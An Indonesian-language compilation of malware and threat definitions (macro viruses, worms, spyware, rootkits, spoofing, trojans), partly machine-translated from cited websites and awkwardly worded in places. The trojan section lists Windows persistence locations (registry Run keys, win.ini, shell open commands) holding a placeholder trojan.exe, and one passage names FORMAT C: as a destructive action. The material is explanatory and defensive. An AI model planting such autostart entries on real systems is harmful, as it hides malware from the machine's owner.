Dalam komputasi terminologi, virus makro adalah virus yang tertulis dalam sebuah bahasa makro maksudnya, bahasa yang dibangun ke dalam aplikasi perangkat lunak seperti pengolah kata. Sejak beberapa aplikasi (terutama, tetapi tidak secara khusus, bagian dari Microsoft Office) makro memungkinkan program yang akan tertanam dalam dokumen, sehingga program dapat berjalan secara otomatis ketika dokumen dibuka, ini menyediakan mekanisme yang berbeda dengan virus yang dapat ditularkan . Inilah sebabnya mengapa hal itu dapat membahayakan tidak terduga membuka lampiran di e-mail. Modern perangkat lunak antivirus mendeteksi virus makro serta jenis lainnya.

Sebuah virus makro dapat ditularkan melalui lampiran e-mail, disket, jaringan, modem, dan internet dan sulit untuk dideteksi. yang tidak terinfeksi dokumen mengandung macro normal. Paling jahat makro dimulai secara otomatis saat dokumen dibuka atau ditutup. Sebuah cara yang umum untuk sebuah virus makro yang menginfeksi komputer adalah dengan mengganti normal dengan virus makro. Virus makro biasa menggantikan perintah dengan nama yang sama dan berjalan ketika perintah dipilih. Dalam kasus-kasus di mana makro dijalankan secara otomatis, makro dibuka tanpa pengguna mengetahui.

Email Viruses

Tipe virus yang disisipkan di attachment email. Jika attachment dibuka maka akan menginfeksi komputer. Program virus tersebut akan mendata daftar alamat akun email pengguna. Secara otomatis virus akan mencopy dirinya dan mengirim email ke daftar akun email. Umumnya akan mengirim mass email, memenuhi trafik jaringan, membuat komputer menjadi lambat dan membuat down server email.

Internet Worms

Worm adalah sejenis program yang bisa mengcopy dan mengirim dirinya via jalur komunikasi jaringan Internet.Umumnya menyerang melalu celah/lubang keamanan OS komputer. Worm mampu mengirim paket data secara terus menerus ke situs tertentu via jalur koneksi LAN/Internet. Efeknya membuat trafik jaringan penuh, memperlambat koneksi dan membuat lambat/hang komputer pengguna. Worm bisa menyebar melalui email atau file dokumen tertentu.

Mobile Phone Viruses

Virus ponsel adalah sejenis virus komputer yang menyebabkan aplikasi ataupun fitur ponsel tidak dapat digunakan semestinya. Kecanggihan ponsel hampir mendekati teknologi komputer. Ponsel juga telah menggunakan sistem operasi terbuka sehingga aplikasi buatan pihak ketiga bisa melengkapi kecanggihan dari fungsi standar pabrikan. Sistem operasi terbuka inilah yang akhirnya menjadi celah bagi masuknya program jahat seperti virus, worm, dan juga Trojan horse. Biasanya virus disamarkan dalam bentuk yang menarik seperti game ataupun gambar. Supaya lebih menarik lagi, permainan ataupun gambar tersebut diselipkan kata-kata yang vulgar.

Obfuscated Spam

Dalam beberapa tahun terakhir, kebingungan(obfuscation) telah digunakan lebih dan lebih oleh spammer untuk membuat bypass filter email spam. Metode standar adalah menggunakan gambar yang tampak seperti teks, karena filter spam khas tidak mampu mengurai pesan tersebut. Untuk melawan spam berbasis gambar, banyak penyaring spam menggunakan aturan heuristik di mana email yang berisi gambar yang ditandai, dan karena tidak banyak email legit terutama terdiri dari gambar besar, bantuan ini dalam mendeteksi berbasis gambar spam. Makalah ini menunjukkan kemudahan dengan Unicode polimorfisme yang dapat digunakan untuk menghindari filter spam seperti SpamAssassin, dan kemudian menggambarkan teknik de-obfuscated yang dapat digunakan untuk menangkap pesan yang telah dikaburkan dengan cara ini.

Page Jacking

Adalah suatu istilah yang mana menggunakan replika dari suatu situs yang terkenal untuk menarik user dan kemudian akan me-redirect mereka ke situs lainnya. Para page-jacker atau pembajak halaman situs web ini biasanya akan meng-copy dan memalsukan halaman situs yang sudah punya reputasi dan juga terkenal. Mereka kemudian mendaftarkan situs-situs palsu tadi ke search engine dan siap menunggu korban yang masuk.

Begitu ada korban yang tertipu maka mereka akan langsung di-redirect ke situs lain yang berisi berbagai macam iklan atau bahkan meminta user untuk memasukkan data-data pribadinya. kegiatan page-jacking ini memang sangat merugikan orang banyak selain juga mengurangi pendapatan bagi situs yang asli. Selain itu page-jacking juga membuat search engine semakin tidak akurat karena berisi situs-situs bohong yang seolah-olah situs aslinya. Page-jacking juga banyak digunakan untuk aktivitas phishing. Untuk mencegah page-jacking

ini maka selalu gunakan bookmark pada web browser Anda terhadap situs-situs yang asli atau Anda bisa juga mengetikkan alamat situs yang asli dengan benar pada web browser.

Palmtop Viruses

Palmtop, handheld atau PDA membuka peluang bagi virus untuk diserang, walaupun saat ini belum banyak ditemukan gangguan yang ada. PDA atau palmtop berjalan dengan suatu sistem operasi seperti Palm, Symbian, Linux atau PocketPC. Ini bisa dimanfaatkan oleh worm untuk diserang tetapi saat ini risiko tersebut masih belum begitu terlihat.Para pembuat virus tampaknya lebih tertarik mentargetkan sistem komputer desktop untuk virus yang dibuatnya. Ini disebabkan karena pengguna komputer desktop saat ini lebih populer dan juga penyebaran virus bisa sangat cepat dengan adanya e-mail dan internet. Mungkin bahaya pada palmtop saat ini adalah mereka digunakan sebagai carrier(pembawa) bagi worm. Begitu Anda melakukan sinkronisasi palmtop atau PDA Anda dengan komputer maka worm tadi akan menyebar ke PC Anda dan melakukan aksinya. Untuk mencegah hal ini maka gunakan selalu anti-virus yang definisi virusnya selalu terupdate.

Pharming

Pharming adalah serangan hacker yang bertujuan untuk mengarahkan lalu lintas ke situs Web lain, situs palsu. Pharming dapat dilakukan baik dengan mengubah file host komputer korban atau dengan eksploitasi kerentanan dalam sebuah perangkat lunak server DNS.

Parasitic Viruses

Biasa dikenal sebagai virus file - melekat pada program-program komputer yang dikenal sebagai file executable seperti. Exe,. Dat,. Com, dan ratusan nama lain yang disebut file ekstensi seperti. Doc,. Xls.,. Swf,. Fla dan banyak ratusan orang lain. Parasit virus memulai atau menjalankan program komputer yang melakukan aktivitas untuk memproses data atau pengolahan data. One of the activities could be to erase and reformat the disk drive such as (next). Salah satu kegiatan yang dapat menghapus dan memformat ulang disk seperti (berikutnya). Sebuah virus parasit dapat memulai program seperti Microsoft DOS FORMAT

C: dan melakukan tingkat tinggi format disk, menghapus semua data pada disk atau merusak disk - sehingga tidak dapat digunakan.

Phising

Phishing adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi peka, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti surat elektronik atau pesan instan.

http://jim.geovedi.com/Publications/InternetWormshttp://translate.google.co.id/translate?hl=id&sl=en&u=http://en.wikipedia.org/wiki/E-mail_spam&ei=DNgVS5zmMc-GkAX mdz7Bg&sa=X&oi=translate&ct=result&resnum=4&ved=0CBcQ7gEwAw&prev=/search%3F %3Dpengertian%2Bemail%2Bviruses%2Bwikipedia%26hl%3Did%26sa%3DGhttp://translate.google.co.id/translate?hl=id&sl=en&tl=id&u=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FE-mail_spam

http://id.wikipedia.org/wiki/Virus_ponsel mobile

Potentially Unwanted Application

Potentilly Unwanted Application (PUA) adalah istilah yang digunakan untuk menggambarkan aplikasi yang, walaupun tidak berbahaya, pada umumnya dianggap tidak cocok untuk jaringan bisnis. PUA utama klasifikasi adalah adware, dialer, spyware non-berbahaya, administrasi remote alat alat dan hacking. Namun, ada beberapa aplikasi yang dapat jatuh ke dalam kategori PUA mungkin dianggap berguna oleh beberapa pengguna.

Produk Sophos yang termasuk PUA deteksi?

Sophos Anti-Virus untuk Windows 2000 +, versi 6.0 dan di atas memberikan memindai berbagai potensial Common adware dan aplikasi yang tidak diinginkan (PUAS). Perhatikan bahwa pemindaian PUA tidak tersedia untuk Windows NT/95/98/Me komputer.

Apa PUA pemindaian?

PUA scan dapat mendeteksi berbagai adware dan berpotensi Common aplikasi yang tidak diinginkan (PUAS). Ini juga menyediakan untuk pembersihan file, entri registry dan di memori proses aplikasi yang mereka tidak ingin berjalan di komputer Anda.

Bagaimana cara mengkonfigurasi komputer untuk PUA pemindaian?

PUA pemindaian dapat diaktifkan sebagai bagian dari kebijakan anti-virus. Untuk rincian tentang cara mengkonfigurasi kebijakan anti virus untuk menyertakan PUA pemindaian, merujuk pada on-line Bantuan atau 'Konfigurasi Scanning' bagian dari Sophos Anti-Virus untuk Windows 2000 + user manual.

Bagaimana cara menyebarkan PUA pemindaian di jaringan saya?

PUA menggelar Sophos merekomendasikan perlindungan secara bertahap di seluruh jaringan Anda. Ini akan memungkinkan Anda kesempatan untuk menilai ancaman untuk sistem anda, memutuskan tindakan yang tepat, dan mengurangi kemungkinan gangguan kepada pengguna.

Mengacu kepada salah satu dari berikut ini artikel berbasis pengetahuan, untuk sebuah strategi peluncuran administrator jaringan yang dapat menggunakan:

Sophos Endpoint Security and Control: suatu strategi peluncuran PUA Sophos solusi bisnis kecil: sebuah strategi peluncuran PUA

Bagaimana cara memperoleh perlindungan yang up to date?

Terbaru PUA deteksi adalah IDE yang tergabung dalam file yang menyediakan update secara teratur untuk anda software anti-virus.

Apakah PUA pemindaian otomatis menghapus aplikasi?

PUA pemindaian akan menginformasikan kepada anda aplikasi-aplikasi yang telah ditemukan. Anda kemudian dapat mengkonfigurasi Sophos Anti-Virus kebijakan untuk memperbolehkan atau menghapus aplikasi dalam daftar ini. Ini memberikan Anda kendali penuh atas apa yang tersedia bagi pengguna, memungkinkan Anda untuk menyimpan atau menghapus setiap aplikasi yang diperlukan.

Jika sesuai, Anda dapat mengkonfigurasi pada kelompok ini oleh kelompok dasar, sehingga mempertahankan beberapa kelompok aplikasi ini dan yang lainnya telah mereka dihapus.

http://www.sophos.com/support/knowledgebase/article/14887.html

ROOTKIT

Rootkit berasal dari 2 kata yaitu root and kit.

Root dalam sebuah jaringan merupakan suatu member/User yang memiliki hak akses paling tinggi dalam sistem Operasi Unix atau sering kita kenal dengan Unix, sehingga jarang sekali orang-orang sebagai administrator jaringan memberikan kunci kepada orang.Kit merupakan merupakan sebuah kumpulan dari tool-tool untuk membuka kunci dari root.sehingga dari pengertian kedua tersebut ROOTKIT merupakan suatu tools yang digunakan untuk membuka suatu system secara permanent tanpa diketahui oleh administrator.ROOTKIT dibedakan menjadi 2 macam, yaitu :

1. Aplication rootkitMengganti atau mengubah program yang aslinya menjadi program yang telah dimodifikasi sedemikan rupa dengan kemampuan trojan.

2. Kernel Rootkit Cara ini sulit untuk dideteksi karena sudah memasuki system kernelnya.

Tujuan Utama dari ROOTKIT :a. Rootkit bukanlah alat untuk menyerang.b. Rootkit lebih ditujukan sebagai alat yang digunakan setelah penyerangan.c. Dengan rootkit seorang hacker akan mampu tetap mengontrol komputer korban

tanpa diketahui

http://wong-bingung-wong.blogspot.com/2008/11/rootkit.html

SPAM

Spam atau junk mail adalah penyalahgunaan dalam pengiriman berita elektronik untuk menampilkan berita iklan dan keperluan lainnya yang mengakibatkan ketidaknyamanan bagi para pengguna web. Bentuk berita spam yang umum dikenal meliputi: spam surat elektronik, spam instant messaging, spam Usenet newsgroup, spam mesin pencari informasi web (web search engine spam), spam blog, spam berita pada telepon genggam, spam forum Internet, dan lain lain.

Spam ini biasanya datang bertubi-tubi tanpa diminta dan sering kali tidak dikehendaki oleh penerimanya. Beberapa contoh lain dari spam ini bisa berupa surat elektronik berisi iklan, sms pada telepon genggam, berita yang masuk dalam suatu forum newsgroup berisi promosi barang yang tidak terkait dengan aktifitas newsgroup tersebut, spamdexing yang mendominir suatu mesin pencari (search engine) untuk mencari popularitas bagi suatu URL tertentu, ataupun bisa berupa berita yang tak berguna dan masuk dalam suatu blog, buku tamu situs web, dan lain-lain.

Spam dikirimkan oleh pembuat iklan dengan biaya operasi yang sangat rendah, karena spam ini tidak memerlukan mailing list untuk mencapai para pelanggan-pelanggan yang diinginkan. Sebagai akibatnya banyak fihak yang dirugikan. Selain pengguna Internet itu sendiri, ISP (penyelenggara layanan Internet atau Internet service provider), dan masyarakat umum juga merasa tidak nyaman. Karena biasanya sangat mengganggu dan kadang-kadang membohongi, berita spam termasuk dalam kegiatan melanggar hukum dan merupakan perbuatan kriminal yang bisa ditindak melalui undang-undang Internet.

http://www.balinter.net/news_77_Pengertian_Spam.html

SPOOFING

Spoofing adalah penciptaan TCP / IP paket menggunakan orang lain alamat IP. Router menggunakan "destination IP" alamat dalam rangka untuk meneruskan paket-paket melalui Internet, tetapi mengabaikan "source IP" address. Alamat itu hanya digunakan oleh komputer tujuan ketika menanggapi kembali ke sumbernya.

Kesalahpahaman yang umum adalah bahwa "IP spoofing" dapat digunakan untuk menyembunyikan alamat IP Anda sambil berselancar di Internet, chatting on-line, mengirim e-mail, dan sebagainya. Ini umumnya tidak benar. Menempa alamat IP sumber menyebabkan tanggapan untuk menjadi salah arah, yang berarti anda tidak dapat membuat sambungan jaringan yang normal.

Namun, IP spoofing, adalah bagian integral dari jaringan banyak serangan yang tidak perlu melihat tanggapan (buta spoofing).

Contoh spoofing:

man-in-the-middle

mengendus paket pada link antara dua titik akhir, dan karena itu dapat berpura-pura menjadi salah satu ujung sambungan

routing redirect

pengalihan informasi routing dari aslinya tuan rumah bagi para hacker tuan rumah (ini adalah bentuk lain dari manusia-in-the-tengah serangan).

routing

indvidual pengalihan paket oleh hacker host

blind spoofing

memprediksi tanggapan dari sebuah host, yang memungkinkan perintah untuk dikirim, tetapi tidak dapat langsung mendapatkan umpan balik.

Flooding

SYN flooding attack mengisi acak menerima antrian dari alamat sumber; smurf / fraggle parodi alamat korban, menyebabkan everyong menanggapi korban.

http://www.iss.net/security_center/advice/Underground/Hacking/Methods/Technical/Spoofing/

default.html

SPYWARE

Spyware secara umum adalah sejenis program yg mengoleksi dan mentranfer informasi ttg

seseorang dan kebiasaan browsingnya untuk keperluan iklan/promosi. Namun akhir2 ini

spyware dpt digunakan untuk tujuan lain, yaitu mencuri data2 penting yg ada di komputer

seseorang seperti, password, no PIN, alamat dll.

Spyware merupakan turunan dari adware, yang memantau kebiasaan pengguna dalam

melakukan penjelajahan Internet untuk mendatangkan “segudang iklan” kepada pengguna.

Tetapi, karena adware kurang begitu berbahaya (tidak melakukan pencurian data), spyware

melakukannya dan mengirimkan hasil yang ia kumpulkan kepada pembuatnya (adware

umumnya hanya mengirimkan data kepada perusahaan marketing).

Sedangkan Adware adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu

kepada sebuah jenis perangkat lunak mencurigakan (malicious software/malware) yang

menginstalasikan dirinya sendiri tanpa sepengetahuan pengguna dan menampilkan iklan-

iklan ketika pengguna berselancar di Internet.

Adware adalah salah satu jenis perangkat lunak yang bersifat “stealth” (tidak terlihat) dan

seringnya terinstalasi ke dalam sistem ketika pengguna mengunduh perangkat lunak

freeware atau shareware dari Internet. Ada banyak adware yang beredar di Internet, dan

beberapa adware tersebut memantau kebiasaan pengguna dalam menjelajahi Internet, dan

mengirimkan informasi ini kepada perusahaan marketing sehingga mereka mengirimkan

iklan kepada pengguna yang bersangkutan. Beberapa perangkat lunak komersial juga

mengandung komponen adware yang kadang disebutkan dalam End-User License

Agreement (EULA) atau tidak. Contohnya adalah web browser Microsoft Internet Explorer

6.0 yang merangkul Alexa.com.

Kebanyakan program antivirus tidak didesain untuk mendeteksi keberadaan adware, karena

tujuan awal dari adware adalah bukan untuk merusak sistem secara agresif (seperti halnya

virus komputer, worm atau Trojan horse), tapi untuk mendukung pengembangan perangkat

lunak freeware atau shareware yang berangkutan. Beberapa adware juga dapat

diklasifikasikan sebagai Trojan oleh beberapa vendor Antivirus, karena selain memantau

kebiasaan pengguna dalam berselancar di Internet, mereka juga dapat mencuri data

pengguna. Contohnya adalah VX2 dan WNAD.EXE.

Untuk mendeteksi keberadaan adware (dan tentu saja untuk meningkatkan privasi),

beberapa utilitas pun beredar di Internet, seperti halnya Ad-Aware dari Lavasoft atau Spybot

Search and Destroy yang dapat mendeteksi serta membuang adware serta perangkat

spyware lainnya. Selain utilitas yang dapat diunduh tersebut, ada juga beberapa situs web

yang menyediakan layanan untuk mencari adware di dalam sistem , seperti halnya

SypChecker.com dan Tom-Cat.com.

back to Spyware,Kerugian-kerugian spyware:

1 Pencurian Data

Memang, kebanyakan informasi yang “dicuri” adalah kebiasaan pengguna dalam

menjelajahi Internet, tapi banyak juga yang mencuri data-data pribadi, seperti halnya

alamat e-mail (untuk dikirimi banyak surat e sampah (spam)).

2 Tambahan Biaya Pemakaian Internet

Yang paling menjengkelkan dari keberadaan spyware, selain banyaknya iklan yang

mengganggu adalah pemborosan bandwidth dan privasi yang telah “dijajah”.

Website Ber-Spyware pada umumnya

Pada umumnya, website yang memberikan spyware adalah website yang memberikan

layanan gratis ataupun website yang menjual produk. Contohnya adalah AOL Mail dan

Grisoft.

2. Tanda2 terkena spyware

1. Browser membuka popup yg tidak diinginkan, atau juga popup windows.

Biasanya isinya spt ini “Your computer has been infected by spyware, click OK to

download xxx anti spyware” //update

2. Homepage pada browser berubah

3. Adanya toolbar yg tidak dikenal di browser

4. Pada menu favorite/ bookmark muncul link2 yg mengarah ke web yg berbau

porno dan judi dll

5. Munculnya shortcut di desktop yg mengarah ke web yg berbau porno atau judi

dll

6. Penurunan kinerja komputer secara drastis

7. Program security seperti antivirus maupun firewall terdisable

8. Di task manager terdapat service yg tidak dikenal

9. Tagihan telpon melonjak (yg pakai koneksi dial up)

10. Aktivitas sent pada saat idle lebih besar upload.

3. Cara mencegah

1. Gunakan anti spyware yg real time scanner (+ yg up to date)

2. Gunakan firewall yg mempunyai inbound dan outbound protection

3. Gunakan browser yg aman (firefox, opera). Kalo masih ingin menggunakan

internet explorer, harap disetting yg aman.

4. Jangan mengunjungi web yg bersifat porno,judi, dsb

5. Tiap kali menginstall program dibaca dulu eulanya. Soalnya ada beberapa

program yg terang2an di eulanya nulis akan menginstall spyware bersamaan dengan

program.

6. Gunakan operating system yg selalu up to date

7. Hati2 dengan file sharing.

8. Jgn membuka attachment email jika dari orang yg tidak dikenal.

9. Jgn mengklik “agree” or “ok” untuk menutup window. Lebih baik klik “x” atau

tekan alt + f4

10. Backup registry, soalnya kalo terkena spyware, walaupun sudah dibersihkan,

registry akan tetap kacau.

11. Menggunakan sandbox system. Keterangannya ada di thread berikut. Untuk

mendownload sandboxie ada di link berikut

http://www.sandboxie.com/SandboxieInstall.exe (Windows 32bit) atau

http://www.sandboxie.com/SandboxieInstall64.exe (Win 64) //update

http://www.chip.co.id/forum/showthread.php?t=37708

Cara mengatasi

1. Scan dengan antispyware

2. Lewat task manager->process, kill service2 yg berkaitan dengan spyware. Untuk

detailnya, gunakan command prompt

ketikan “tasklist /svc” (win xp pro). Disini ditampilkan setiap program yg dijalankaan

oleh sebuah service. Atau gunakan “process explorer”

(http://www.sysinternals.com)

3. Hapus registry yg berkaitan dengan spyware di

hkey_local_machine\software\microsoft\windows\curr entversion -> run,run-, dan

runonce

biasanya ga perlu, soalnya biasanya sudah dihapus oleh porgram antispywarenya.

4. Download software hijackthis di

http://www.spywareinfo.com/~merijn/downloads.html. Terus hasilnya di post di

http://www.chip.co.id/forum/showthread.php?t=20180

5. Restore backup registry. Program erunt dapat didownload di

http://www.snapfiles.com/download/dlerunt.html

http://fadli06.ngeblogs.com/2009/11/16/pengertian-spyware/

TROJAN HORSE

Istilah Trojan Horse (Kuda Troya) berasal dari mitologi Yunani pada saat perang Troya. Dalam peperangan tersebut pasukan Yunani melawan pasukan kerajaan Troya. Pasukan Yunani telah mengepung kota Troya selama sepuluh tahun, namun karena pasukan kerajaan

Troya cukup tangguh, maka pasukan Yunani sulit mengalahkannya. Akhirnya, pasukan Yunani membuat strategi yaitu dengan membuat sebuah kuda raksasa yang terbuat dari kayu. Kuda dari kayu ini cukup unik, di dalamnya berongga sehingga dapat diisi pasukan Yunani. Pasukan Yunani pura-pura mundur dan sambil memberikan hadiah kuda kayu raksasa tersebut. Dengan bantuan seorang spionase Yunani yang bernama Sinon, penduduk kota Troya berhasil diyakinkan untuk menerima kuda kayu raksasa itu dan memasukkannya ke dalam kota. Pada malam harinya, pasukan Yunani yang berada di dalam kuda kayu keluar, kemudian membuka gerbang dan kota Troya diserang. Dengan cara tersebut kota Troya dapat dikuasai oleh Yunani [9].Kisah epik di atas telah mengilhami para hacker untuk menciptakan “penyusup” ke komputer orang lain yang disebut dengan Trojan Horse. Trojan pada saat ini berkaitan dengan masalah keamanan komputer yang cukup serius. Trojan dapat masuk ke komputer dengan melalui beberapa cara dan dari berbagai sumber yang kurang dapat dipercaya di Internet atau dari orang lain [1].Seperti halnya virus, jumlah trojan yang semakin lama semakin bertambah banyak, karena hacker atau pembuat program Trojan (programmer) yang selalu bereksperimen untuk mengembangkannya. Trojan tidak mempunyai masa aktif, maksudnya Trojan akan ada selamanya (bersarang) dan tidak pernah akan habis. Ada banyak hal yang dapat dikembangkan oleh programmer agar program yang dibuat tidak terdeteksi oleh anti-virus atau trojan scanner. Programmer akan selalu bereksperimen untuk menciptakan Trojan yang unik dengan fungsi-fungsi baru dengan metode enkripsi yang lebih hebat [7].Secara teknis, Trojan dapat muncul di mana saja dan kapan saja, di sistem operasi manapun dan berbagai platform. Kecepatan peredaran Trojan secepat virus. Secara umum Trojan berasal dari program-program yang di download dari Internet, terutama freeware atau shareware yang mencurigakan dan tidak berasal dari situs aslinya [7].Salah satu indikasi komputer yang terinfeksi oleh Trojan dapat digambarkan sebagai berikut. Pada saat komputer terhubung dengan Internet, misalnya saat mengobrol (chating) atau memeriksa e-mail, tetapi hardisk bekerja dengan sibuk (busy) dalam waktu yang lama. Selain itu pemakai juga tidak sedang menjalankan program aplikasi besar atau men-download sesuatu yang mengharuskan piringan hardisk berputar cukup lama. Kejadian tersebut termasuk kejadian aneh yang patut dicurigai adanya penyusupan [10].2.1 Definisi TrojanTrojan di dalam sistem komputer adalah suatu program yang tidak diharapkan dan disisipkan tanpa sepengetahuan pemilik komputer. Program ini kemudian dapat diaktifkan dan dikendalikan dari jarak jauh, atau dengan menggunakan timer (pewaktu). Akibatnya, komputer yang disisipi Trojan Horse tersebut dapat dikendalikan dari jarak jauh [5] [6] [9].Definisi lain mengatakan bahwa Trojan adalah program apapun yang digunakan untuk melaksanakan suatu fungsi penting dan diharapkan oleh pemakai, namun kode dan fungsi di

dalamnya tidak dikenal oleh pemakai. Selanjutnya program melaksanakan fungsi tak dikenal dan dikendalikan dari jarak jauh yang tidak dikehendaki oleh pemakai [8].2.2 Fungsi TrojanTrojan bersembunyi di latar belakang dengan cara membuka port tertentu dan menunggu diaktifkan oleh penyerang. Komputer yang telah terinfeksi dapat dikendalikan oleh penyerang melalui versi client-nya [10].Cara kerja Trojan mirip dengan remote administration tool, dengan sifat dan fungsi yang sama. Program remote administration misalnya pcAnywhere, digunakan untuk keperluan yang benar dan sah (legitimate), sedangkan Trojam digunakan untuk keperluan yang negatif [5].

Jika sebuah komputer terinfeksi oleh Trojan dan telah dikendalikan oleh penyerangnya, maka beberapa kemungkinan dapat terjadi. Sebagai contoh, sebuah Trojan dengan nama NetBus dapat melakukan banyak hal ke komputer yang telah dikendalikan antara lain : [10]• menghapus file,• mengirim dan mengambil file,• menjalankan program-program aplikasi,• menampilkan gambar,• mengintip program-program yang sedang dijalankan,• menutup program-program yang dijalankan,• melihat apa saja yang sedang diketik,• membuka dan menutup CD-ROM drive,• mengirim pesan dan mengajak untuk bicara (chat),• mematikan komputer.Contoh di atas adalah hanya sebagian yang dapat dikerjakan oleh sebuah Trojan. Trojan lain kemungkinan mempunyai fungsi yang berbeda bahkan mungkin lebih berbahaya dan lebih susah dideteksi.Dalam aplikasi belanja online, Trojan adalah salah satu ancaman bagi penjual dan pembeli. Trojan dapat digunakan untuk mencuri nomor kartu kredit dengan cara menangkap ketikan saat dilakukan proses transaksi online [6].Cara lain adalah memanfaatkan lubang kemanan pada operating system di sisi penjual atau pemberi jasa (server) dimanfaatkan untuk menyadap data-data pelanggannya (client). Jika lubang ini dieksploitasi, kemungkinan data seluruh pelanggan dari server tersebut jatuh ke tangan penyadap [6].Contoh dari penyusupan Trojan dalam belanja online terdapat dalam Gambar 2.1.

Deteksi Trojan dan PenanganannyaGambar 2.1 Penyusupan Trojan dalam Belanja Online [6]

2.3 Cara Kerja TrojanTrojan masuk melalui dua bagian, yaitu bagian client dan server. Ketika korban (tanpa diketahui) menjalankan komputer, kemudian penyerang akan menggunakan client untuk koneksi dengan server dan mulai menggunakan trojan. Protokol TCP/IP adalah jenis protokol yang umum digunakan untuk komunikasi. Trojan dapat bekerja dengan baik dengan jenis protokol ini, tetapi beberapa trojan juga dapat menggunakan protokol UDP dengan baik. Ketika server mulai dijalankan (pada komputer korban), Trojan umumnya mencoba untuk menyembunyikan diri di suatu tempat dalam sistem komputer tersebut, kemudian mulai “mendengarkan” di beberapa port untuk melakukan koneksi, memodifikasi registry dan atau menggunakan metode lain yaitu metode autostarting [8].Hal yang penting untuk diketahui oleh penyerang adalah mengetahui IP address korban untuk menghubungkan komputernya ke komputer korban. Banyak varian Trojan mempunyai kemampuan mengirimkan IP address korban ke penyerangnya, misalnya media ICQ maupun IRC. Hal ini digunakan bagi korban yang mempunyai

Deteksi Trojan dan PenanganannyaIP address dinamis, yang berarti setiap kali menghubungkan ke Internet didapatkan IP address yang berbeda. Untuk pemakai yang memanfaatkan Asymmetric Digital Suscriber Line (ADSL) berarti selalu memakai IP address yang tetap (statis) sehingga mudah diketahui dan mudah untuk dikoneksikan dengan komputer penyerang [8].Sebagian besar Trojan menggunakan metode auto-starting, yaitu Trojan akan secara otomatis aktif saat komputer dihidupkan. Walaupun komputer dimatikan dan kemudian dihidupkan lagi, Trojan mampu bekerja kembali dan penyerang mengakses kembali ke komputer korban [8].Metode baru auto-starting dan trik lain telah ditemukan sejak semula. Jenis Trojan ini bekerja mulai dari koneksi trojan ke dalam beberapa file executable yang sering digunakan misalnya explorer.exe dan kemudian memodifikasi file sistem atau Windows Registry. File sistem ditempatkan di direktori Windows. Dari direktori ini penyerang melaksanakan penyerangan atau penyalahgunaan. Penyalahgunaan penyerang melewati file sistem adalah sebagai berikut [8].• Autostart Folder.Autostart folder berada di lokasi C:\Windows\Start Menu\Programs\Startup dan sesuai dengan namanya akan bekerja secara otomatis bagia file sistem yang ditempatkan di folder tersebut.• Win.Ini.File sistem Windows menggunakan load=trojan.exe dan run=trojan.exe untuk menjalankan Trojan.• System.Ini.

Menggunakan shell=explorer.exe trojan.exe. Hal ini diakibatkan oleh eksekusi setiap file setelah menjalankan explorer.exe.• Wininit.Ini.Sebagian besar setup program menggunakan file ini. Sekali dijalankan maka menjadi auto-delete, akibatnya Trojan sangat cekatan atau cepat untuk bekerja kembali.

Deteksi Trojan dan Penanganannya• Winstart.Bat.Bertindak seperti batch file yang normal, ketika ditambahkan@ trojan.exe mampu menyembunyikan korbannya.• Autoexec.Bat.Autoexec.Bat adalah file auto-starting Disk Operating System (DOS). File tersebut digunakan sebagai metode auto-starting, yaitu dengan memasang c:\trojan.exe.• Config.Sys.Config.Sys juga dapat digunakan sebagai suatu metode auto-starting untuk Trojan.• Explorer Startup.Explorer Startup adalah suatu metode auto-starting untuk Windows95, 98, ME dan jika c:\explorer.exe ada, hal itu akan dimulai maka akan menggantikan yang umum, yaitu c:\Windows\Explorer.exe.Registry sering digunakan dalam berbagai metode auto-starting. Registry sebagai jalan untuk auto-starting yang diketahui antara lain: [7]• [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]“Info”=”c:\directory\Trojan.exe”• [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]“Info”=”c:\directory\Trojan.exe”• [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]“Info”=”c:\directory\Trojan.exe”• [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]“Info=”c:\directory\Trojan.exe”• [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]“Info”=”c:\directory\Trojan.exe”• [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

“Info”=”c:\directory\Trojan.exe”

Deteksi Trojan dan Penanganannya• Registry Shell Open[HKEY_CLASSES_ROOT\exefile\shell\open\command][HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]Suatu kunci dengan nilai “% 1%*” harus ditempatkan disana dan jika terdapat beberapa file yang executable. Setiap kali file dieksekusi maka akan membuka suatu binary file. Jika di registry ini terdapat trojan.exe “% 1%*”, maka akan digunakan sebagai auto-starting untuk Trojan.• Metode Deteksi ICQ Net[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]Kunci dari metode ini adalah semua file akan dieksekusi jika ICQ mendeteksi koneksi Internet. Perlu diketahui, bahwa cara kerja dari ICQ adalah sangat mudah dan sering digunakan pemakai, sehingga ICQ dimanfaatkan oleh penyerang medianya.• ActiveX Component[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName]StubPath=C:\directory\Trojan.exe2.4 Jenis jenis TrojanTrojan seperti halnya virus, mempunyai jumlah yang cukup banyak dan berkembang seiring dengan berjalannya waktu. Terdapat kurang lebih 650 buah Trojan yang telah beredar saat ini [4]. Pendapat lain mengatakan bahwa di tahun 2002 sudah terdapat sekitar 800 buah Trojan [7]. Jumlah tersebut adalah jumlah yang diketahui atau terdeteksi keberadaannya, sedangkan yang tidak terdeteksi tidak diketahui jumlahnya.Dari berbagai macam Trojan yang telah beredar dan menginfeksi pemakai Internet, dapat diklasifikasikan berdasarkan ciri-cirinya. Menurut Dancho Danchev (2004), Trojan dapat diklasifikasikan menjadi delapan jenis, antara lain sebagai berikut.

Deteksi Trojan dan Penanganannya2.4.1 Trojan Remote AccessTrojan Remote Access termasuk Trojan paling populer saat ini. Banyak penyerang menggunakan Trojan ini dengan alasan fungsi yang banyak dan sangat mudah dalam penggunaannya. Prosesnya adalah menunggu seseorang menjalankan Trojan yang berfungsi sebagai server dan jika penyerang telah memiliki IP address korban, maka penyerang dapat mengendalikan secara penuh komputer korban. Contoh jenis Trojan ini adalah Back Orifice

